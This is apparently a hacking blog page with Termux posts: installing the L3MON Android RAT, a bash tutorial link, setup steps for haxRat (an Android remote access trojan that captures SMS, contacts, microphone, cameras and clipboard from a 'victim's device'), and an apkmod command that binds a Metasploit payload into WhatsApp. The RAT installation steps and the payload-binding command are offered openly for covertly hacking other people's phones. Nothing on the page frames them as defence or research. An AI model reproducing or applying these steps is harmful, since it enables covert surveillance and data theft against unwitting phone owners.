Thursday 10 September 2020

Install LEMON / L3MON In Termux No VPS No Root

11 comments


 Hey guys so today i am sharing a easy way to install L3MON/LEMON in your termux :) 

Requirements : 

Steps :

  • First update and upgrade your termux 
  • apt update && apt upgrade
    

  • Now install lemon by a simple apt command
  • apt install lemon
So congratulations you have lemon and now you can make lemon juice LOL

Some Useful Videos Regarding lemon

Install Lemon In Termux

Setup Lemon on WAN

Bind lemon with app

Read More

Saturday 5 September 2020

Learn Bash From Scratch In Hindi In Termux

11 comments


Hey guys so if you are reading this post trust me you are going to change yourself into a cold blooded programmer.

You need only one thing i.e TERMUX. Here you can learn bash programming language without computer or laptop. Just an android phone.

Yes, i am sharing my whole playlist of bash series which is in hindi language. I recieved lots of positive feedbacks for this series and i am damn sure you will enjoy it :)

And don't forget to subscribe my channel because i will add more videos on bash until world ends.

So here is Link of Playlist 

Click here

Read More

Monday 29 June 2020

Install HaxRat In Termux Or Kali Linux

26 comments


Hey guys so again welcome to my website and today I would like to introduce my new project haxRat ( A Android RAT ) with cool features.

Key features

  • GPS Logging
  • ScreenShot capture
  • Screen recording
  • Rear Camera Recorder
  • Front camera recorder
  • Device Lock
  • Microphone Recording
  • SMS capture
  • SMS send
  • Notification Access ( Including whatsapp instagram or more )
  • View Contacts
  • Call Logs
  • Live Clipboard capture
  • File explorer and downloader
  • List of installed apps on device

TODO

  • Call Blocker
  • Contact adder
  • Call recording
  • Keylogger
  • You can request your own ;)
Well so let's come to the installation process 

Installation

There are two ways to install it 
  1. Using TermuxBlacK ( Click Me To Install )
  2. Manually from GitHub

Using TermuxBlacK 

If you are Termux Black user then you can install haxRat by simple apt command 

apt update && apt install haxrat

Manually From GitHub

Ok so now if you don't want to install Termuxblack or you don't have TermuX and want to install it in Kali Linux or Ubuntu so this section is for you :)
  • First clone the repository 
git clone https://github.com/hax4us/haxRat.git
  • Install Java 8
sudo apt install openjdk-8-jre 
  • Install NodeJs CLICK HERE
  • Now goto server directory of haxRat 
cd haxRat/server
  • Install all node dependencies
npm install
  • Now you can run haxRat server
node index.js
  • Navigate in browser to
localhost:22533

Ok so now you will see a login panel just like below


Default Username : admin
Default password : CLICK ME TO GET PASSWORD

OK so after login you will see a user interface just like this


 you will not see any online devices in list but don't worry. You will have to first create haxRat client app to install in victim's device.

I am not going to write about how to make app and how to install HaxRat in victim's device because i already made videos about all those topics which are required and necessary to install & setup haxRat server & haxRat client to hack any android device :)

Here is list of all must watch videos 

Setup haxRat for first time CLICK ME
Setup L3MON with PORTMAP to hack devices on WAN ( wide area network ) CLICK ME ( you can follow same video for haxRat also )

Read More

Sunday 21 June 2020

Bind Metasploit Payload With App In Termux

12 comments


So let's bind Metasploit Payload in any android application in termux. You can also bind Metasploit Payload with GBWhatsapp using apkmod.

REQUIREMENTS 

  • Termux 
  • Apkmod Installed in Termux
  • That's it :)

INSTALL APKMOD IN TERMUX

Goto this page CLICK HERE

Ok so now let's bind an app with metasploit payload 

STEPS 

  • First make sure that you have Installed metasploit already and have your original app in which you want to bind :)
  • Execute apkmod with -b option to give your original legit app and -o option to give new name for binded app and lhost & lport to make payload with lhost and lport at same time. 
  • General Syntax of using apkmod is 
apkmod -b -i original.apk -o binded.apk lhost=yourLhostHere lport=yourLportHere

EXAMPLE

Ok so i will give you a demo by binding payload in whatsapp

apkmod -b -i /sdcard/Whatsapp.apk -o mybindedapp.apk lhost=127.0.0.1 lport=4444

After above command , apkmod will make the payload with given lhost & lport then bind with gbwhatsapp. 

Happy Payloading .. :)

You can always contact me at telegram 


Read More